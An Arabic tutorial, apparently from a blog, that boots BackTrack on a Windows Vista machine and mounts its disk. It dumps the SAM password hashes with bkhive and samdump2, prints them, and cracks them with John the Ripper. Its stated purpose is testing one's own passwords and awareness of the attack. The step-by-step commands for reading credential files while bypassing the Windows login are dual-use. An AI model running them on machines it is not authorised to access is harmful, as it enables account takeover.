فك تشفير كلمة المرور في الويندوز


----------------------------

قبل الدخول في موضوع المقالة, إذا أردت معرفة قوة كلمة المرور التي تستخدمها بدون أن تستعمل برامج معينة لفك تشفير الباسوورد, هذا الموقع يحسب لك الوقت المتوقع لكسر تشفير كلمة المرور التي تستعملها.

----------------------------


تم تطبيق هذه الخطوات على ويندوز فيستا مع توزيعة باك تراك 5

الهدف من المقالة هو
معرفة قوة كلمات المرور التي تستخدمها في الويندوز امام برامج كسر كلمات المرور مثل برنامج جون ذا ريبر

للانتباه إلى هذا النوع من الهجوم الذي قد يستخدمه البعض على جهازك إذا تمكن من الوصول إليه


للمتعة :)



أدخل على توزيعة باك تراك على الجهاز الذي يحتوي على الويندوز, وبعد الإقلاع اكتب في سطر الاوامر:
root@bt:~# fdisk -l

Device Boot Start End Blocks Id System
/dev/sda1 1 192 1536000 82 Linux swap / Solaris
Partition 1 does not end on cylinder boundary.
/dev/sda2 * 192 12352 97680384 7 HPFS/NTFS
/dev/sda3 12353 24322 96143297+ 5 Extended
/dev/sda5 12353 20297 63818010+ 83 Linux


لمعرفة مكان الويندوز في الهارد ديسك.

ثم انشئ مجلدا لتحمل عليه الويندوز
mkdir /mnt/sda2


حمل الويندوز (قد يختلف مكان الويندوز لديك)
mount /dev/sda2 /mnt/sda2


ادخل على المجلد الذي يحتوي على كلمات المرور
cd /mnt/sda2/Windows/System32/config


الخطوات التالية لاستخراج ملف كلمات المرور (لاحظ أننا تخطينا طلب كلمة المرور في الويندوز للوصول إلى هذا الملف)
root@bt:/mnt/sda2/Windows/System32/config# bkhive system /tmp/out.txt

root@bt:/mnt/sda2/Windows/System32/config# samdump2 sam /tmp/out.txt > /tmp/hash.txt



الان كلمات المرور المشفرة اصبحت في الملف
/tmp/hash.txt


للتأكد من وجودها نكتب
root@bt:/mnt/sda2/Windows/System32/config# cat /tmp/hash.txt
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test:1001:aad3b435b51404eeaad3b435b51404ee:eb4ff39b74b0cbce20a4f62dbd1e3585:::
test2:1002:aad3b435b51404eeaad3b435b51404ee:7ce21f17c0aee7fb9ceba532d0546ad6:::


الان اذهب الى المجلد الذي يحتوي على برنامج فك تشفير كلمات المرور جون ذا ريبر
cd /pentest/passwords/john


وننقل إليه ملف كلمات المرور المشفرة
mv /tmp/hash.txt hash.txt


نبدأ في محاولة فك التشفير
./john -format=NT hash.txt


سيقوم البرنامج بمحاولة كل الاحتمالات الممكنة لمطابقة كلمات المرور, وقد تأخذ العملية بعض الوقت على حسب قوة\طول كلمة المرور وسرعة المعالج.